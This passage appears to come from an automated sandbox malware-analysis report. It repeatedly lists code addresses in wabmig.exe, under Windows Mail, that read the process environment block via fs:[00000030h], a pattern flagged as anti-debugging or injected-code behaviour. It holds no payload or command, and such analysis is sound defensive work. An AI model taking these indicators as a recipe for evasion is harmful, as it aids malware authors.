          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A04144 mov eax, dword ptr fs:[00000030h]10_2_21A04144
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A04144 mov eax, dword ptr fs:[00000030h]10_2_21A04144
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A04144 mov ecx, dword ptr fs:[00000030h]10_2_21A04144
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A04144 mov eax, dword ptr fs:[00000030h]10_2_21A04144
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A04144 mov eax, dword ptr fs:[00000030h]10_2_21A04144
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A45152 mov eax, dword ptr fs:[00000030h]10_2_21A45152
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21975096 mov eax, dword ptr fs:[00000030h]10_2_21975096
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A909C mov eax, dword ptr fs:[00000030h]10_2_219A909C
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199D090 mov eax, dword ptr fs:[00000030h]10_2_2199D090
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199D090 mov eax, dword ptr fs:[00000030h]10_2_2199D090
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196D08D mov eax, dword ptr fs:[00000030h]10_2_2196D08D
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A360B8 mov eax, dword ptr fs:[00000030h]10_2_21A360B8
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A360B8 mov ecx, dword ptr fs:[00000030h]10_2_21A360B8
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197208A mov eax, dword ptr fs:[00000030h]10_2_2197208A
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F20DE mov eax, dword ptr fs:[00000030h]10_2_219F20DE
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219990DB mov eax, dword ptr fs:[00000030h]10_2_219990DB
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219870C0 mov eax, dword ptr fs:[00000030h]10_2_219870C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219870C0 mov ecx, dword ptr fs:[00000030h]10_2_219870C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219870C0 mov ecx, dword ptr fs:[00000030h]10_2_219870C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219870C0 mov eax, dword ptr fs:[00000030h]10_2_219870C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219870C0 mov ecx, dword ptr fs:[00000030h]10_2_219870C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219870C0 mov ecx, dword ptr fs:[00000030h]10_2_219870C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219870C0 mov eax, dword ptr fs:[00000030h]10_2_219870C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219870C0 mov eax, dword ptr fs:[00000030h]10_2_219870C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219870C0 mov eax, dword ptr fs:[00000030h]10_2_219870C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219870C0 mov eax, dword ptr fs:[00000030h]10_2_219870C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219870C0 mov eax, dword ptr fs:[00000030h]10_2_219870C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219870C0 mov eax, dword ptr fs:[00000030h]10_2_219870C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219870C0 mov eax, dword ptr fs:[00000030h]10_2_219870C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219870C0 mov eax, dword ptr fs:[00000030h]10_2_219870C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219870C0 mov eax, dword ptr fs:[00000030h]10_2_219870C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219870C0 mov eax, dword ptr fs:[00000030h]10_2_219870C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219870C0 mov eax, dword ptr fs:[00000030h]10_2_219870C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219870C0 mov eax, dword ptr fs:[00000030h]10_2_219870C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196C0F0 mov eax, dword ptr fs:[00000030h]10_2_2196C0F0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B20F0 mov ecx, dword ptr fs:[00000030h]10_2_219B20F0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196A0E3 mov ecx, dword ptr fs:[00000030h]10_2_2196A0E3
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219950E4 mov eax, dword ptr fs:[00000030h]10_2_219950E4
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219950E4 mov ecx, dword ptr fs:[00000030h]10_2_219950E4
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A450D9 mov eax, dword ptr fs:[00000030h]10_2_21A450D9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219780E9 mov eax, dword ptr fs:[00000030h]10_2_219780E9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198E016 mov eax, dword ptr fs:[00000030h]10_2_2198E016
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198E016 mov eax, dword ptr fs:[00000030h]10_2_2198E016
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198E016 mov eax, dword ptr fs:[00000030h]10_2_2198E016
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198E016 mov eax, dword ptr fs:[00000030h]10_2_2198E016
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3903E mov eax, dword ptr fs:[00000030h]10_2_21A3903E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3903E mov eax, dword ptr fs:[00000030h]10_2_21A3903E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3903E mov eax, dword ptr fs:[00000030h]10_2_21A3903E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3903E mov eax, dword ptr fs:[00000030h]10_2_21A3903E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196A020 mov eax, dword ptr fs:[00000030h]10_2_2196A020
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196C020 mov eax, dword ptr fs:[00000030h]10_2_2196C020
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A45060 mov eax, dword ptr fs:[00000030h]10_2_21A45060
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21972050 mov eax, dword ptr fs:[00000030h]10_2_21972050
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199B052 mov eax, dword ptr fs:[00000030h]10_2_2199B052
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21981070 mov eax, dword ptr fs:[00000030h]10_2_21981070
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21981070 mov ecx, dword ptr fs:[00000030h]10_2_21981070
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21981070 mov eax, dword ptr fs:[00000030h]10_2_21981070
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21981070 mov eax, dword ptr fs:[00000030h]10_2_21981070
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21981070 mov eax, dword ptr fs:[00000030h]10_2_21981070
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21981070 mov eax, dword ptr fs:[00000030h]10_2_21981070
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21981070 mov eax, dword ptr fs:[00000030h]10_2_21981070
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21981070 mov eax, dword ptr fs:[00000030h]10_2_21981070
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21981070 mov eax, dword ptr fs:[00000030h]10_2_21981070
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21981070 mov eax, dword ptr fs:[00000030h]10_2_21981070
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21981070 mov eax, dword ptr fs:[00000030h]10_2_21981070
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21981070 mov eax, dword ptr fs:[00000030h]10_2_21981070
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21981070 mov eax, dword ptr fs:[00000030h]10_2_21981070
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199C073 mov eax, dword ptr fs:[00000030h]10_2_2199C073
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1705E mov ebx, dword ptr fs:[00000030h]10_2_21A1705E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1705E mov eax, dword ptr fs:[00000030h]10_2_21A1705E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21968397 mov eax, dword ptr fs:[00000030h]10_2_21968397
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21968397 mov eax, dword ptr fs:[00000030h]10_2_21968397
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21968397 mov eax, dword ptr fs:[00000030h]10_2_21968397
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219C739A mov eax, dword ptr fs:[00000030h]10_2_219C739A
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219C739A mov eax, dword ptr fs:[00000030h]10_2_219C739A
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199438F mov eax, dword ptr fs:[00000030h]10_2_2199438F
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199438F mov eax, dword ptr fs:[00000030h]10_2_2199438F
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196E388 mov eax, dword ptr fs:[00000030h]10_2_2196E388
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196E388 mov eax, dword ptr fs:[00000030h]10_2_2196E388
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196E388 mov eax, dword ptr fs:[00000030h]10_2_2196E388
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A4539D mov eax, dword ptr fs:[00000030h]10_2_21A4539D
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A33A0 mov eax, dword ptr fs:[00000030h]10_2_219A33A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A33A0 mov eax, dword ptr fs:[00000030h]10_2_219A33A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219933A5 mov eax, dword ptr fs:[00000030h]10_2_219933A5
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2F3E6 mov eax, dword ptr fs:[00000030h]10_2_21A2F3E6
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197A3C0 mov eax, dword ptr fs:[00000030h]10_2_2197A3C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197A3C0 mov eax, dword ptr fs:[00000030h]10_2_2197A3C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197A3C0 mov eax, dword ptr fs:[00000030h]10_2_2197A3C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197A3C0 mov eax, dword ptr fs:[00000030h]10_2_2197A3C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197A3C0 mov eax, dword ptr fs:[00000030h]10_2_2197A3C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197A3C0 mov eax, dword ptr fs:[00000030h]10_2_2197A3C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219783C0 mov eax, dword ptr fs:[00000030h]10_2_219783C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219783C0 mov eax, dword ptr fs:[00000030h]10_2_219783C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219783C0 mov eax, dword ptr fs:[00000030h]10_2_219783C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219783C0 mov eax, dword ptr fs:[00000030h]10_2_219783C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A453FC mov eax, dword ptr fs:[00000030h]10_2_21A453FC
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A63FF mov eax, dword ptr fs:[00000030h]10_2_219A63FF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198E3F0 mov eax, dword ptr fs:[00000030h]10_2_2198E3F0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198E3F0 mov eax, dword ptr fs:[00000030h]10_2_2198E3F0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198E3F0 mov eax, dword ptr fs:[00000030h]10_2_2198E3F0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2C3CD mov eax, dword ptr fs:[00000030h]10_2_21A2C3CD
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219803E9 mov eax, dword ptr fs:[00000030h]10_2_219803E9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219803E9 mov eax, dword ptr fs:[00000030h]10_2_219803E9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219803E9 mov eax, dword ptr fs:[00000030h]10_2_219803E9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219803E9 mov eax, dword ptr fs:[00000030h]10_2_219803E9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219803E9 mov eax, dword ptr fs:[00000030h]10_2_219803E9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219803E9 mov eax, dword ptr fs:[00000030h]10_2_219803E9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219803E9 mov eax, dword ptr fs:[00000030h]10_2_219803E9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219803E9 mov eax, dword ptr fs:[00000030h]10_2_219803E9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2B3D0 mov ecx, dword ptr fs:[00000030h]10_2_21A2B3D0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196C310 mov ecx, dword ptr fs:[00000030h]10_2_2196C310
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21990310 mov ecx, dword ptr fs:[00000030h]10_2_21990310
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3132D mov eax, dword ptr fs:[00000030h]10_2_21A3132D
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3132D mov eax, dword ptr fs:[00000030h]10_2_21A3132D
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AA30B mov eax, dword ptr fs:[00000030h]10_2_219AA30B
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AA30B mov eax, dword ptr fs:[00000030h]10_2_219AA30B
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AA30B mov eax, dword ptr fs:[00000030h]10_2_219AA30B
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F930B mov eax, dword ptr fs:[00000030h]10_2_219F930B
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F930B mov eax, dword ptr fs:[00000030h]10_2_219F930B
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F930B mov eax, dword ptr fs:[00000030h]10_2_219F930B
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21967330 mov eax, dword ptr fs:[00000030h]10_2_21967330
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F32A mov eax, dword ptr fs:[00000030h]10_2_2199F32A
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F035C mov eax, dword ptr fs:[00000030h]10_2_219F035C
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F035C mov eax, dword ptr fs:[00000030h]10_2_219F035C
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F035C mov eax, dword ptr fs:[00000030h]10_2_219F035C
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F035C mov ecx, dword ptr fs:[00000030h]10_2_219F035C
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F035C mov eax, dword ptr fs:[00000030h]10_2_219F035C
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F035C mov eax, dword ptr fs:[00000030h]10_2_219F035C
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21969353 mov eax, dword ptr fs:[00000030h]10_2_21969353
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21969353 mov eax, dword ptr fs:[00000030h]10_2_21969353
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2F367 mov eax, dword ptr fs:[00000030h]10_2_21A2F367
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F2349 mov eax, dword ptr fs:[00000030h]10_2_219F2349
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F2349 mov eax, dword ptr fs:[00000030h]10_2_219F2349
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F2349 mov eax, dword ptr fs:[00000030h]10_2_219F2349
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F2349 mov eax, dword ptr fs:[00000030h]10_2_219F2349
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F2349 mov eax, dword ptr fs:[00000030h]10_2_219F2349
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F2349 mov eax, dword ptr fs:[00000030h]10_2_219F2349
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F2349 mov eax, dword ptr fs:[00000030h]10_2_219F2349
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F2349 mov eax, dword ptr fs:[00000030h]10_2_219F2349
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F2349 mov eax, dword ptr fs:[00000030h]10_2_219F2349
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F2349 mov eax, dword ptr fs:[00000030h]10_2_219F2349
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F2349 mov eax, dword ptr fs:[00000030h]10_2_219F2349
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F2349 mov eax, dword ptr fs:[00000030h]10_2_219F2349
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F2349 mov eax, dword ptr fs:[00000030h]10_2_219F2349
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F2349 mov eax, dword ptr fs:[00000030h]10_2_219F2349
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F2349 mov eax, dword ptr fs:[00000030h]10_2_219F2349
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196D34C mov eax, dword ptr fs:[00000030h]10_2_2196D34C
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196D34C mov eax, dword ptr fs:[00000030h]10_2_2196D34C
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1437C mov eax, dword ptr fs:[00000030h]10_2_21A1437C
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A45341 mov eax, dword ptr fs:[00000030h]10_2_21A45341
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21977370 mov eax, dword ptr fs:[00000030h]10_2_21977370
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21977370 mov eax, dword ptr fs:[00000030h]10_2_21977370
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21977370 mov eax, dword ptr fs:[00000030h]10_2_21977370
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3A352 mov eax, dword ptr fs:[00000030h]10_2_21A3A352
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A072A0 mov eax, dword ptr fs:[00000030h]10_2_21A072A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A072A0 mov eax, dword ptr fs:[00000030h]10_2_21A072A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A062A0 mov eax, dword ptr fs:[00000030h]10_2_21A062A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A062A0 mov ecx, dword ptr fs:[00000030h]10_2_21A062A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A062A0 mov eax, dword ptr fs:[00000030h]10_2_21A062A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A062A0 mov eax, dword ptr fs:[00000030h]10_2_21A062A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A062A0 mov eax, dword ptr fs:[00000030h]10_2_21A062A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A062A0 mov eax, dword ptr fs:[00000030h]10_2_21A062A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A329E mov eax, dword ptr fs:[00000030h]10_2_219A329E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A329E mov eax, dword ptr fs:[00000030h]10_2_219A329E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A392A6 mov eax, dword ptr fs:[00000030h]10_2_21A392A6
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A392A6 mov eax, dword ptr fs:[00000030h]10_2_21A392A6
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A392A6 mov eax, dword ptr fs:[00000030h]10_2_21A392A6
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A392A6 mov eax, dword ptr fs:[00000030h]10_2_21A392A6
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F0283 mov eax, dword ptr fs:[00000030h]10_2_219F0283
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F0283 mov eax, dword ptr fs:[00000030h]10_2_219F0283
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F0283 mov eax, dword ptr fs:[00000030h]10_2_219F0283
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AE284 mov eax, dword ptr fs:[00000030h]10_2_219AE284
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AE284 mov eax, dword ptr fs:[00000030h]10_2_219AE284
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F92BC mov eax, dword ptr fs:[00000030h]10_2_219F92BC
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F92BC mov eax, dword ptr fs:[00000030h]10_2_219F92BC
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F92BC mov ecx, dword ptr fs:[00000030h]10_2_219F92BC
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F92BC mov ecx, dword ptr fs:[00000030h]10_2_219F92BC
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A45283 mov eax, dword ptr fs:[00000030h]10_2_21A45283
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219802A0 mov eax, dword ptr fs:[00000030h]10_2_219802A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219802A0 mov eax, dword ptr fs:[00000030h]10_2_219802A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219852A0 mov eax, dword ptr fs:[00000030h]10_2_219852A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219852A0 mov eax, dword ptr fs:[00000030h]10_2_219852A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219852A0 mov eax, dword ptr fs:[00000030h]10_2_219852A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219852A0 mov eax, dword ptr fs:[00000030h]10_2_219852A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196B2D3 mov eax, dword ptr fs:[00000030h]10_2_2196B2D3
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196B2D3 mov eax, dword ptr fs:[00000030h]10_2_2196B2D3
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196B2D3 mov eax, dword ptr fs:[00000030h]10_2_2196B2D3
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A452E2 mov eax, dword ptr fs:[00000030h]10_2_21A452E2
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F2D0 mov eax, dword ptr fs:[00000030h]10_2_2199F2D0
